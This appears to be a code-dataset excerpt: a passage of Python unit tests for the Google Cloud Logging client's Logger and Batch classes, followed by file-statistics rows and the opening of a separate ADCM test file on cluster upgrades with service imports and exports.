STRUCT = {"message": "MESSAGE", "weather": "cloudy"}
DEFAULT_LABELS = {"foo": "spam"}
LABELS = {"foo": "bar", "baz": "qux"}
IID = "IID"
SEVERITY = "CRITICAL"
METHOD = "POST"
URI = "https://api.example.com/endpoint"
STATUS = "500"
TRACE = "12345678-1234-5678-1234-567812345678"
SPANID = "000000000000004a"
REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
TIMESTAMP = datetime.datetime(2016, 12, 31, 0, 1, 2, 999999)
RESOURCE = Resource(
type="gae_app", labels={"module_id": "default", "version_id": "test"}
)
ENTRIES = [
{
"logName": ALT_LOG_NAME,
"jsonPayload": STRUCT,
"labels": LABELS,
"insertId": IID,
"severity": SEVERITY,
"httpRequest": REQUEST,
"timestamp": "2016-12-31T00:01:02.999999Z",
"resource": RESOURCE._to_dict(),
"trace": TRACE,
"spanId": SPANID,
"traceSampled": True,
}
]
client1 = _Client(self.PROJECT)
client2 = _Client(self.PROJECT)
api = client2.logging_api = _DummyLoggingAPI()
logger = self._make_one(self.LOGGER_NAME, client=client1, labels=DEFAULT_LABELS)
logger.log_struct(
STRUCT,
log_name=ALT_LOG_NAME,
client=client2,
labels=LABELS,
insert_id=IID,
severity=SEVERITY,
http_request=REQUEST,
timestamp=TIMESTAMP,
resource=RESOURCE,
trace=TRACE,
span_id=SPANID,
trace_sampled=True,
)
self.assertEqual(api._write_entries_called_with, (ENTRIES, None, None, None))
def test_log_proto_defaults(self):
import json
from google.protobuf.json_format import MessageToJson
from google.protobuf.struct_pb2 import Struct, Value
message = Struct(fields={"foo": Value(bool_value=True)})
ENTRIES = [
{
"logName": "projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME),
"protoPayload": json.loads(MessageToJson(message)),
"resource": {"type": "global", "labels": {}},
}
]
client = _Client(self.PROJECT)
api = client.logging_api = _DummyLoggingAPI()
logger = self._make_one(self.LOGGER_NAME, client=client)
logger.log_proto(message)
self.assertEqual(api._write_entries_called_with, (ENTRIES, None, None, None))
def test_log_proto_w_default_labels(self):
import json
from google.protobuf.json_format import MessageToJson
from google.protobuf.struct_pb2 import Struct, Value
message = Struct(fields={"foo": Value(bool_value=True)})
DEFAULT_LABELS = {"foo": "spam"}
ENTRIES = [
{
"logName": "projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME),
"protoPayload": json.loads(MessageToJson(message)),
"resource": {"type": "global", "labels": {}},
"labels": DEFAULT_LABELS,
}
]
client = _Client(self.PROJECT)
api = client.logging_api = _DummyLoggingAPI()
logger = self._make_one(self.LOGGER_NAME, client=client, labels=DEFAULT_LABELS)
logger.log_proto(message)
self.assertEqual(api._write_entries_called_with, (ENTRIES, None, None, None))
def test_log_proto_w_explicit(self):
import json
import datetime
from google.protobuf.json_format import MessageToJson
from google.protobuf.struct_pb2 import Struct
from google.protobuf.struct_pb2 import Value
from google.cloud.logging import Resource
message = Struct(fields={"foo": Value(bool_value=True)})
ALT_LOG_NAME = "projects/foo/logs/alt.log.name"
DEFAULT_LABELS = {"foo": "spam"}
LABELS = {"foo": "bar", "baz": "qux"}
IID = "IID"
SEVERITY = "CRITICAL"
METHOD = "POST"
URI = "https://api.example.com/endpoint"
STATUS = "500"
TRACE = "12345678-1234-5678-1234-567812345678"
SPANID = "000000000000004a"
REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
TIMESTAMP = datetime.datetime(2016, 12, 31, 0, 1, 2, 999999)
RESOURCE = Resource(
type="gae_app", labels={"module_id": "default", "version_id": "test"}
)
ENTRIES = [
{
"logName": ALT_LOG_NAME,
"protoPayload": json.loads(MessageToJson(message)),
"labels": LABELS,
"insertId": IID,
"severity": SEVERITY,
"httpRequest": REQUEST,
"timestamp": "2016-12-31T00:01:02.999999Z",
"resource": RESOURCE._to_dict(),
"trace": TRACE,
"spanId": SPANID,
"traceSampled": True,
}
]
client1 = _Client(self.PROJECT)
client2 = _Client(self.PROJECT)
api = client2.logging_api = _DummyLoggingAPI()
logger = self._make_one(self.LOGGER_NAME, client=client1, labels=DEFAULT_LABELS)
logger.log_proto(
message,
log_name=ALT_LOG_NAME,
client=client2,
labels=LABELS,
insert_id=IID,
severity=SEVERITY,
http_request=REQUEST,
timestamp=TIMESTAMP,
resource=RESOURCE,
trace=TRACE,
span_id=SPANID,
trace_sampled=True,
)
self.assertEqual(api._write_entries_called_with, (ENTRIES, None, None, None))
def test_delete_w_bound_client(self):
client = _Client(project=self.PROJECT)
api = client.logging_api = _DummyLoggingAPI()
logger = self._make_one(self.LOGGER_NAME, client=client)
logger.delete()
self.assertEqual(
api._logger_delete_called_with,
(f"projects/{self.PROJECT}/logs/{self.LOGGER_NAME}"),
)
def test_delete_w_alternate_client(self):
client1 = _Client(project=self.PROJECT)
client2 = _Client(project=self.PROJECT)
api = client2.logging_api = _DummyLoggingAPI()
logger = self._make_one(self.LOGGER_NAME, client=client1)
logger.delete(client=client2)
self.assertEqual(
api._logger_delete_called_with,
(f"projects/{self.PROJECT}/logs/{self.LOGGER_NAME}"),
)
def test_list_entries_defaults(self):
from google.cloud.logging import Client
TOKEN = "TOKEN"
client = Client(
project=self.PROJECT, credentials=_make_credentials(), _use_grpc=False
)
returned = {"nextPageToken": TOKEN}
client._connection = _Connection(returned)
logger = self._make_one(self.LOGGER_NAME, client=client)
iterator = logger.list_entries()
page = next(iterator.pages)
entries = list(page)
token = iterator.next_page_token
self.assertEqual(len(entries), 0)
self.assertEqual(token, TOKEN)
LOG_FILTER = "logName=projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME)
# check call payload
call_payload_no_filter = deepcopy(client._connection._called_with)
call_payload_no_filter["data"]["filter"] = "removed"
self.assertEqual(
call_payload_no_filter,
{
"path": "/entries:list",
"method": "POST",
"data": {
"filter": "removed",
"resourceNames": [f"projects/{self.PROJECT}"],
},
},
)
# verify that default filter is 24 hours
timestamp = datetime.strptime(
client._connection._called_with["data"]["filter"],
LOG_FILTER + " AND timestamp>=" + self.TIME_FORMAT,
)
yesterday = datetime.now(timezone.utc) - timedelta(days=1)
self.assertLess(yesterday - timestamp, timedelta(minutes=1))
def test_list_entries_explicit(self):
from google.cloud.logging import DESCENDING
from google.cloud.logging import Client
PROJECT1 = "PROJECT1"
PROJECT2 = "PROJECT2"
INPUT_FILTER = "resource.type:global"
TOKEN = "TOKEN"
PAGE_SIZE = 42
client = Client(
project=self.PROJECT, credentials=_make_credentials(), _use_grpc=False
)
client._connection = _Connection({})
logger = self._make_one(self.LOGGER_NAME, client=client)
iterator = logger.list_entries(
resource_names=[f"projects/{PROJECT1}", f"projects/{PROJECT2}"],
filter_=INPUT_FILTER,
order_by=DESCENDING,
page_size=PAGE_SIZE,
page_token=TOKEN,
)
entries = list(iterator)
token = iterator.next_page_token
self.assertEqual(len(entries), 0)
self.assertIsNone(token)
# self.assertEqual(client._listed, LISTED)
# check call payload
call_payload_no_filter = deepcopy(client._connection._called_with)
call_payload_no_filter["data"]["filter"] = "removed"
self.assertEqual(
call_payload_no_filter,
{
"method": "POST",
"path": "/entries:list",
"data": {
"filter": "removed",
"orderBy": DESCENDING,
"pageSize": PAGE_SIZE,
"pageToken": TOKEN,
"resourceNames": [f"projects/{PROJECT1}", f"projects/{PROJECT2}"],
},
},
)
# verify that default filter is 24 hours
LOG_FILTER = "logName=projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME,)
combined_filter = (
INPUT_FILTER
+ " AND "
+ LOG_FILTER
+ " AND "
+ "timestamp>="
+ self.TIME_FORMAT
)
timestamp = datetime.strptime(
client._connection._called_with["data"]["filter"], combined_filter
)
yesterday = datetime.now(timezone.utc) - timedelta(days=1)
self.assertLess(yesterday - timestamp, timedelta(minutes=1))
def test_list_entries_explicit_timestamp(self):
from google.cloud.logging import DESCENDING
from google.cloud.logging import Client
PROJECT1 = "PROJECT1"
PROJECT2 = "PROJECT2"
INPUT_FILTER = 'resource.type:global AND timestamp="2020-10-13T21"'
TOKEN = "TOKEN"
PAGE_SIZE = 42
client = Client(
project=self.PROJECT, credentials=_make_credentials(), _use_grpc=False
)
client._connection = _Connection({})
logger = self._make_one(self.LOGGER_NAME, client=client)
iterator = logger.list_entries(
resource_names=[f"projects/{PROJECT1}", f"projects/{PROJECT2}"],
filter_=INPUT_FILTER,
order_by=DESCENDING,
page_size=PAGE_SIZE,
page_token=TOKEN,
)
entries = list(iterator)
token = iterator.next_page_token
self.assertEqual(len(entries), 0)
self.assertIsNone(token)
# self.assertEqual(client._listed, LISTED)
# check call payload
LOG_FILTER = "logName=projects/%s/logs/%s" % (self.PROJECT, self.LOGGER_NAME,)
combined_filter = INPUT_FILTER + " AND " + LOG_FILTER
self.assertEqual(
client._connection._called_with,
{
"method": "POST",
"path": "/entries:list",
"data": {
"filter": combined_filter,
"orderBy": DESCENDING,
"pageSize": PAGE_SIZE,
"pageToken": TOKEN,
"resourceNames": [f"projects/{PROJECT1}", f"projects/{PROJECT2}"],
},
},
)
class TestBatch(unittest.TestCase):
PROJECT = "test-project"
@staticmethod
def _get_target_class():
from google.cloud.logging import Batch
return Batch
def _make_one(self, *args, **kwargs):
return self._get_target_class()(*args, **kwargs)
def test_ctor_defaults(self):
logger = _Logger()
client = _Client(project=self.PROJECT)
batch = self._make_one(logger, client)
self.assertIs(batch.logger, logger)
self.assertIs(batch.client, client)
self.assertEqual(len(batch.entries), 0)
def test_log_empty_defaults(self):
from google.cloud.logging import LogEntry
ENTRY = LogEntry()
client = _Client(project=self.PROJECT, connection=_make_credentials())
logger = _Logger()
batch = self._make_one(logger, client=client)
batch.log_empty()
self.assertEqual(batch.entries, [ENTRY])
def test_log_empty_explicit(self):
import datetime
from google.cloud.logging import Resource
from google.cloud.logging import LogEntry
LABELS = {"foo": "bar", "baz": "qux"}
IID = "IID"
SEVERITY = "CRITICAL"
METHOD = "POST"
URI = "https://api.example.com/endpoint"
STATUS = "500"
REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
TIMESTAMP = datetime.datetime(2016, 12, 31, 0, 1, 2, 999999)
RESOURCE = Resource(
type="gae_app", labels={"module_id": "default", "version_id": "test"}
)
TRACE = "12345678-1234-5678-1234-567812345678"
SPANID = "000000000000004a"
ENTRY = LogEntry(
labels=LABELS,
insert_id=IID,
severity=SEVERITY,
http_request=REQUEST,
timestamp=TIMESTAMP,
resource=RESOURCE,
trace=TRACE,
span_id=SPANID,
trace_sampled=True,
)
client = _Client(project=self.PROJECT, connection=_make_credentials())
logger = _Logger()
batch = self._make_one(logger, client=client)
batch.log_empty(
labels=LABELS,
insert_id=IID,
severity=SEVERITY,
http_request=REQUEST,
timestamp=TIMESTAMP,
resource=RESOURCE,
trace=TRACE,
span_id=SPANID,
trace_sampled=True,
)
self.assertEqual(batch.entries, [ENTRY])
def test_log_text_defaults(self):
from google.cloud.logging_v2.entries import _GLOBAL_RESOURCE
from google.cloud.logging import TextEntry
TEXT = "This is the entry text"
ENTRY = TextEntry(payload=TEXT, resource=_GLOBAL_RESOURCE)
client = _Client(project=self.PROJECT, connection=_make_credentials())
logger = _Logger()
batch = self._make_one(logger, client=client)
batch.log_text(TEXT)
self.assertEqual(batch.entries, [ENTRY])
def test_log_text_explicit(self):
import datetime
from google.cloud.logging import Resource
from google.cloud.logging import TextEntry
TEXT = "This is the entry text"
LABELS = {"foo": "bar", "baz": "qux"}
IID = "IID"
SEVERITY = "CRITICAL"
METHOD = "POST"
URI = "https://api.example.com/endpoint"
STATUS = "500"
REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
TIMESTAMP = datetime.datetime(2016, 12, 31, 0, 1, 2, 999999)
RESOURCE = Resource(
type="gae_app", labels={"module_id": "default", "version_id": "test"}
)
TRACE = "12345678-1234-5678-1234-567812345678"
SPANID = "000000000000004a"
ENTRY = TextEntry(
payload=TEXT,
labels=LABELS,
insert_id=IID,
severity=SEVERITY,
http_request=REQUEST,
timestamp=TIMESTAMP,
resource=RESOURCE,
trace=TRACE,
span_id=SPANID,
trace_sampled=True,
)
client = _Client(project=self.PROJECT, connection=_make_credentials())
logger = _Logger()
batch = self._make_one(logger, client=client)
batch.log_text(
TEXT,
labels=LABELS,
insert_id=IID,
severity=SEVERITY,
http_request=REQUEST,
timestamp=TIMESTAMP,
resource=RESOURCE,
trace=TRACE,
span_id=SPANID,
trace_sampled=True,
)
self.assertEqual(batch.entries, [ENTRY])
def test_log_struct_defaults(self):
from google.cloud.logging_v2.entries import _GLOBAL_RESOURCE
from google.cloud.logging import StructEntry
STRUCT = {"message": "Message text", "weather": "partly cloudy"}
ENTRY = StructEntry(payload=STRUCT, resource=_GLOBAL_RESOURCE)
client = _Client(project=self.PROJECT, connection=_make_credentials())
logger = _Logger()
batch = self._make_one(logger, client=client)
batch.log_struct(STRUCT)
self.assertEqual(batch.entries, [ENTRY])
def test_log_struct_explicit(self):
import datetime
from google.cloud.logging import Resource
from google.cloud.logging import StructEntry
STRUCT = {"message": "Message text", "weather": "partly cloudy"}
LABELS = {"foo": "bar", "baz": "qux"}
IID = "IID"
SEVERITY = "CRITICAL"
METHOD = "POST"
URI = "https://api.example.com/endpoint"
STATUS = "500"
TRACE = "12345678-1234-5678-1234-567812345678"
SPANID = "000000000000004a"
REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
TIMESTAMP = datetime.datetime(2016, 12, 31, 0, 1, 2, 999999)
RESOURCE = Resource(
type="gae_app", labels={"module_id": "default", "version_id": "test"}
)
ENTRY = StructEntry(
payload=STRUCT,
labels=LABELS,
insert_id=IID,
severity=SEVERITY,
http_request=REQUEST,
timestamp=TIMESTAMP,
resource=RESOURCE,
trace=TRACE,
span_id=SPANID,
trace_sampled=True,
)
client = _Client(project=self.PROJECT, connection=_make_credentials())
logger = _Logger()
batch = self._make_one(logger, client=client)
batch.log_struct(
STRUCT,
labels=LABELS,
insert_id=IID,
severity=SEVERITY,
http_request=REQUEST,
timestamp=TIMESTAMP,
resource=RESOURCE,
trace=TRACE,
span_id=SPANID,
trace_sampled=True,
)
self.assertEqual(batch.entries, [ENTRY])
def test_log_proto_defaults(self):
from google.cloud.logging_v2.entries import _GLOBAL_RESOURCE
from google.cloud.logging import ProtobufEntry
from google.protobuf.struct_pb2 import Struct
from google.protobuf.struct_pb2 import Value
message = Struct(fields={"foo": Value(bool_value=True)})
ENTRY = ProtobufEntry(payload=message, resource=_GLOBAL_RESOURCE)
client = _Client(project=self.PROJECT, connection=_make_credentials())
logger = _Logger()
batch = self._make_one(logger, client=client)
batch.log_proto(message)
self.assertEqual(batch.entries, [ENTRY])
def test_log_proto_explicit(self):
import datetime
from google.cloud.logging import Resource
from google.cloud.logging import ProtobufEntry
from google.protobuf.struct_pb2 import Struct
from google.protobuf.struct_pb2 import Value
message = Struct(fields={"foo": Value(bool_value=True)})
LABELS = {"foo": "bar", "baz": "qux"}
IID = "IID"
SEVERITY = "CRITICAL"
METHOD = "POST"
URI = "https://api.example.com/endpoint"
STATUS = "500"
TRACE = "12345678-1234-5678-1234-567812345678"
SPANID = "000000000000004a"
REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
TIMESTAMP = datetime.datetime(2016, 12, 31, 0, 1, 2, 999999)
RESOURCE = Resource(
type="gae_app", labels={"module_id": "default", "version_id": "test"}
)
ENTRY = ProtobufEntry(
payload=message,
labels=LABELS,
insert_id=IID,
severity=SEVERITY,
http_request=REQUEST,
timestamp=TIMESTAMP,
resource=RESOURCE,
trace=TRACE,
span_id=SPANID,
trace_sampled=True,
)
client = _Client(project=self.PROJECT, connection=_make_credentials())
logger = _Logger()
batch = self._make_one(logger, client=client)
batch.log_proto(
message,
labels=LABELS,
insert_id=IID,
severity=SEVERITY,
http_request=REQUEST,
timestamp=TIMESTAMP,
resource=RESOURCE,
trace=TRACE,
span_id=SPANID,
trace_sampled=True,
)
self.assertEqual(batch.entries, [ENTRY])
def test_commit_w_unknown_entry_type(self):
from google.cloud.logging_v2.entries import _GLOBAL_RESOURCE
from google.cloud.logging import LogEntry
logger = _Logger()
client = _Client(project=self.PROJECT, connection=_make_credentials())
api = client.logging_api = _DummyLoggingAPI()
batch = self._make_one(logger, client)
batch.entries.append(LogEntry(severity="blah"))
ENTRY = {"severity": "blah", "resource": _GLOBAL_RESOURCE._to_dict()}
batch.commit()
self.assertEqual(list(batch.entries), [])
self.assertEqual(
api._write_entries_called_with, ([ENTRY], logger.full_name, None, None)
)
def test_commit_w_resource_specified(self):
from google.cloud.logging_v2.entries import _GLOBAL_RESOURCE
from google.cloud.logging import Resource
logger = _Logger()
client = _Client(project=self.PROJECT, connection=_make_credentials())
api = client.logging_api = _DummyLoggingAPI()
RESOURCE = Resource(
type="gae_app", labels={"module_id": "default", "version_id": "test"}
)
batch = self._make_one(logger, client, resource=RESOURCE)
MESSAGE = "This is the entry text"
ENTRIES = [
{"textPayload": MESSAGE},
{"textPayload": MESSAGE, "resource": _GLOBAL_RESOURCE._to_dict()},
]
batch.log_text(MESSAGE, resource=None)
batch.log_text(MESSAGE)
batch.commit()
self.assertEqual(
api._write_entries_called_with,
(ENTRIES, logger.full_name, RESOURCE._to_dict(), None),
)
def test_commit_w_bound_client(self):
import json
import datetime
from google.protobuf.json_format import MessageToJson
from google.protobuf.struct_pb2 import Struct
from google.protobuf.struct_pb2 import Value
from google.cloud._helpers import _datetime_to_rfc3339
from google.cloud.logging_v2.entries import _GLOBAL_RESOURCE
TEXT = "This is the entry text"
STRUCT = {"message": TEXT, "weather": "partly cloudy"}
message = Struct(fields={"foo": Value(bool_value=True)})
IID1 = "IID1"
IID2 = "IID2"
IID3 = "IID3"
TIMESTAMP1 = datetime.datetime(2016, 12, 31, 0, 0, 1, 999999)
TIMESTAMP2 = datetime.datetime(2016, 12, 31, 0, 0, 2, 999999)
TIMESTAMP3 = datetime.datetime(2016, 12, 31, 0, 0, 3, 999999)
TRACE1 = "12345678-1234-5678-1234-567812345678"
TRACE2 = "12345678-1234-5678-1234-567812345679"
TRACE3 = "12345678-1234-5678-1234-567812345670"
SPANID1 = "000000000000004a"
SPANID2 = "000000000000004b"
SPANID3 = "000000000000004c"
ENTRIES = [
{
"textPayload": TEXT,
"insertId": IID1,
"timestamp": _datetime_to_rfc3339(TIMESTAMP1),
"resource": _GLOBAL_RESOURCE._to_dict(),
"trace": TRACE1,
"spanId": SPANID1,
"traceSampled": True,
},
{
"jsonPayload": STRUCT,
"insertId": IID2,
"timestamp": _datetime_to_rfc3339(TIMESTAMP2),
"resource": _GLOBAL_RESOURCE._to_dict(),
"trace": TRACE2,
"spanId": SPANID2,
"traceSampled": False,
},
{
"protoPayload": json.loads(MessageToJson(message)),
"insertId": IID3,
"timestamp": _datetime_to_rfc3339(TIMESTAMP3),
"resource": _GLOBAL_RESOURCE._to_dict(),
"trace": TRACE3,
"spanId": SPANID3,
"traceSampled": True,
},
]
client = _Client(project=self.PROJECT)
api = client.logging_api = _DummyLoggingAPI()
logger = _Logger()
batch = self._make_one(logger, client=client)
batch.log_text(
TEXT,
insert_id=IID1,
timestamp=TIMESTAMP1,
trace=TRACE1,
span_id=SPANID1,
trace_sampled=True,
)
batch.log_struct(
STRUCT,
insert_id=IID2,
timestamp=TIMESTAMP2,
trace=TRACE2,
span_id=SPANID2,
trace_sampled=False,
)
batch.log_proto(
message,
insert_id=IID3,
timestamp=TIMESTAMP3,
trace=TRACE3,
span_id=SPANID3,
trace_sampled=True,
)
batch.commit()
self.assertEqual(list(batch.entries), [])
self.assertEqual(
api._write_entries_called_with, (ENTRIES, logger.full_name, None, None)
)
def test_commit_w_alternate_client(self):
import json
from google.protobuf.json_format import MessageToJson
from google.protobuf.struct_pb2 import Struct
from google.protobuf.struct_pb2 import Value
from google.cloud.logging import Logger
from google.cloud.logging_v2.entries import _GLOBAL_RESOURCE
TEXT = "This is the entry text"
STRUCT = {"message": TEXT, "weather": "partly cloudy"}
message = Struct(fields={"foo": Value(bool_value=True)})
DEFAULT_LABELS = {"foo": "spam"}
LABELS = {"foo": "bar", "baz": "qux"}
SEVERITY = "CRITICAL"
METHOD = "POST"
URI = "https://api.example.com/endpoint"
STATUS = "500"
REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
client1 = _Client(project=self.PROJECT)
client2 = _Client(project=self.PROJECT)
api = client2.logging_api = _DummyLoggingAPI()
logger = Logger("logger_name", client1, labels=DEFAULT_LABELS)
ENTRIES = [
{
"textPayload": TEXT,
"labels": LABELS,
"resource": _GLOBAL_RESOURCE._to_dict(),
},
{
"jsonPayload": STRUCT,
"severity": SEVERITY,
"resource": _GLOBAL_RESOURCE._to_dict(),
},
{
"protoPayload": json.loads(MessageToJson(message)),
"httpRequest": REQUEST,
"resource": _GLOBAL_RESOURCE._to_dict(),
},
]
batch = self._make_one(logger, client=client1)
batch.log_text(TEXT, labels=LABELS)
batch.log_struct(STRUCT, severity=SEVERITY)
batch.log_proto(message, http_request=REQUEST)
batch.commit(client=client2)
self.assertEqual(list(batch.entries), [])
self.assertEqual(
api._write_entries_called_with,
(ENTRIES, logger.full_name, None, DEFAULT_LABELS),
)
def test_context_mgr_success(self):
import json
from google.protobuf.json_format import MessageToJson
from google.protobuf.struct_pb2 import Struct
from google.protobuf.struct_pb2 import Value
from google.cloud.logging import Logger
from google.cloud.logging_v2.entries import _GLOBAL_RESOURCE
TEXT = "This is the entry text"
STRUCT = {"message": TEXT, "weather": "partly cloudy"}
message = Struct(fields={"foo": Value(bool_value=True)})
DEFAULT_LABELS = {"foo": "spam"}
LABELS = {"foo": "bar", "baz": "qux"}
SEVERITY = "CRITICAL"
METHOD = "POST"
URI = "https://api.example.com/endpoint"
STATUS = "500"
REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
client = _Client(project=self.PROJECT)
api = client.logging_api = _DummyLoggingAPI()
logger = Logger("logger_name", client, labels=DEFAULT_LABELS)
ENTRIES = [
{
"textPayload": TEXT,
"httpRequest": REQUEST,
"resource": _GLOBAL_RESOURCE._to_dict(),
},
{
"jsonPayload": STRUCT,
"labels": LABELS,
"resource": _GLOBAL_RESOURCE._to_dict(),
},
{
"protoPayload": json.loads(MessageToJson(message)),
"resource": _GLOBAL_RESOURCE._to_dict(),
"severity": SEVERITY,
},
]
batch = self._make_one(logger, client=client)
with batch as other:
other.log_text(TEXT, http_request=REQUEST)
other.log_struct(STRUCT, labels=LABELS)
other.log_proto(message, severity=SEVERITY)
self.assertEqual(list(batch.entries), [])
self.assertEqual(
api._write_entries_called_with,
(ENTRIES, logger.full_name, None, DEFAULT_LABELS),
)
def test_context_mgr_failure(self):
import datetime
from google.protobuf.struct_pb2 import Struct
from google.protobuf.struct_pb2 import Value
from google.cloud.logging import TextEntry
from google.cloud.logging import StructEntry
from google.cloud.logging import ProtobufEntry
TEXT = "This is the entry text"
STRUCT = {"message": TEXT, "weather": "partly cloudy"}
LABELS = {"foo": "bar", "baz": "qux"}
IID = "IID"
SEVERITY = "CRITICAL"
METHOD = "POST"
URI = "https://api.example.com/endpoint"
STATUS = "500"
REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
TIMESTAMP = datetime.datetime(2016, 12, 31, 0, 1, 2, 999999)
message = Struct(fields={"foo": Value(bool_value=True)})
client = _Client(project=self.PROJECT)
api = client.logging_api = _DummyLoggingAPI()
logger = _Logger()
UNSENT = [
TextEntry(payload=TEXT, insert_id=IID, timestamp=TIMESTAMP),
StructEntry(payload=STRUCT, severity=SEVERITY),
ProtobufEntry(payload=message, labels=LABELS, http_request=REQUEST),
]
batch = self._make_one(logger, client=client)
try:
with batch as other:
other.log_text(TEXT, insert_id=IID, timestamp=TIMESTAMP)
other.log_struct(STRUCT, severity=SEVERITY)
other.log_proto(message, labels=LABELS, http_request=REQUEST)
raise _Bugout()
except _Bugout:
pass
self.assertEqual(list(batch.entries), UNSENT)
self.assertIsNone(api._write_entries_called_with)
class _Logger(object):
labels = None
def __init__(self, name="NAME", project="PROJECT"):
self.full_name = "projects/%s/logs/%s" % (project, name)
class _DummyLoggingAPI(object):
_write_entries_called_with = None
def write_entries(self, entries, *, logger_name=None, resource=None, labels=None):
self._write_entries_called_with = (entries, logger_name, resource, labels)
def logger_delete(self, logger_name):
self._logger_delete_called_with = logger_name
class _Client(object):
def __init__(self, project, connection=None):
self.project = project
self._connection = connection
class _Bugout(Exception):
pass
class _Connection(object):
_called_with = None
def __init__(self, *responses):
self._responses = responses
def api_request(self, **kw):
self._called_with = kw
response, self._responses = self._responses[0], self._responses[1:]
return response
| 35.741379
| 88
| 0.58211
| 4,400
| 43,533
| 5.555227
| 0.068182
| 0.025774
| 0.025161
| 0.036002
| 0.851573
| 0.829726
| 0.791597
| 0.762345
| 0.751381
| 0.733871
| 0
| 0.033321
| 0.307169
| 43,533
| 1,217
| 89
| 35.770748
| 0.777096
| 0.01755
| 0
| 0.710626
| 0
| 0
| 0.113526
| 0.020375
| 0
| 0
| 0
| 0
| 0.060721
| 1
| 0.043643
| false
| 0.001898
| 0.081594
| 0.001898
| 0.144213
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86d42d202892202a4ed4ecc8fb938780083a78bf
| 10,186
|
py
|
Python
|
tests/functional/test_upgrade_cluster_imports.py
|
AKhodus/adcm
|
98dbf22af3f1c6afa94505e9acaff0ac4088a602
|
[
"Apache-2.0"
] | null | null | null |
tests/functional/test_upgrade_cluster_imports.py
|
AKhodus/adcm
|
98dbf22af3f1c6afa94505e9acaff0ac4088a602
|
[
"Apache-2.0"
] | null | null | null |
tests/functional/test_upgrade_cluster_imports.py
|
AKhodus/adcm
|
98dbf22af3f1c6afa94505e9acaff0ac4088a602
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import allure
import coreapi
import pytest
from adcm_client.objects import ADCMClient
from adcm_pytest_plugin.utils import get_data_dir, parametrize_by_data_subdirs
from tests.library import errorcodes as err
@allure.step('Bind service and cluster')
def bind_service_and_cluster(cluster_import, service, cluster):
cluster_import.bind(service)
cluster_import.bind(cluster)
def test_upgrade_cluster_with_import(sdk_client_fs: ADCMClient):
"""Scenario:
1. Create cluster for upgrade with exports
2. Create upgradable cluster with imports
3. Bind service and cluster
4. Upgrade cluster
5. Check that cluster was upgraded
"""
with allure.step('Create cluster with exports'):
bundle = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'upgrade_cluster_with_export'))
cluster = bundle.cluster_create("test")
service = cluster.service_add(name="hadoop")
cluster_config_before = cluster.config()
service_config_before = service.config()
with allure.step('Create cluster for upgrade with imports'):
bundle_import = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'upgradable_cluster_with_import'))
cluster_import = bundle_import.cluster_create("cluster_import")
bind_service_and_cluster(cluster_import, service, cluster)
with allure.step('Upgrade cluster'):
upgr = cluster.upgrade(name='upgrade to 1.6')
upgr.do()
with allure.step('Check that cluster was upgraded'):
cluster.reread()
service.reread()
cluster_config_after = cluster.config()
service_config_after = service.config()
assert cluster.prototype().version == '1.6'
assert service.prototype().version == '2.2'
for variable in cluster_config_before:
assert cluster_config_before[variable] == cluster_config_after[variable]
for variable in service_config_before:
assert service_config_before[variable] == service_config_after[variable]
def test_upgrade_cluster_with_export(sdk_client_fs: ADCMClient):
"""Scenario:
1. Create cluster for upgrade with export
2. Create cluster for upgrade with import
3. Load upgradable bundle with import
4. Bind service and cluster
5. Upgrade cluster with import
6. Check that cluster was upgraded
"""
with allure.step('Create cluster for upgrade with exports'):
bundle = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'cluster_with_export'))
cluster = bundle.cluster_create("test")
service = cluster.service_add(name="hadoop")
with allure.step('Create cluster for upgrade with imports. Load upgradable bundle with import'):
bundle_import = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'upgrade_cluster_with_import'))
sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'upgradable_cluster_with_import'))
cluster_import = bundle_import.cluster_create("cluster_import")
bind_service_and_cluster(cluster_import, service, cluster)
with allure.step('Upgrade cluster with import to 1.6'):
upgr = cluster_import.upgrade(name='upgrade to 1.6')
id_before = cluster_import.prototype_id
upgr.do()
with allure.step('Check that cluster was upgraded'):
cluster_import.reread()
assert cluster_import.prototype().version == '1.6'
assert cluster_import.prototype_id != id_before
@parametrize_by_data_subdirs(__file__, "upgradable_cluster_with_strict_incorrect_version")
def test_incorrect_import_strict_version(sdk_client_fs: ADCMClient, path):
"""Upgrade cluster with service incorrect strict version
Scenario:
1. Create cluster for upgrade with exports
2. Create upgradable cluster with import
3. Create upgradable cluster with import and incorrect strict version
4. Create service
5. Import service from cluster with export to cluster from step 2 (with import)
6. Upgrade cluster from step 1
7. Check that cluster was not upgraded because incorrect version for service
in cluster with import
"""
with allure.step('Create cluster for upgrade with exports for strict test'):
bundle = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'upgrade_cluster_with_export_for_strict_test'))
sdk_client_fs.upload_from_fs(path)
cluster = bundle.cluster_create("test")
service = cluster.service_add(name="hadoop")
with allure.step('Create upgradable cluster with import'):
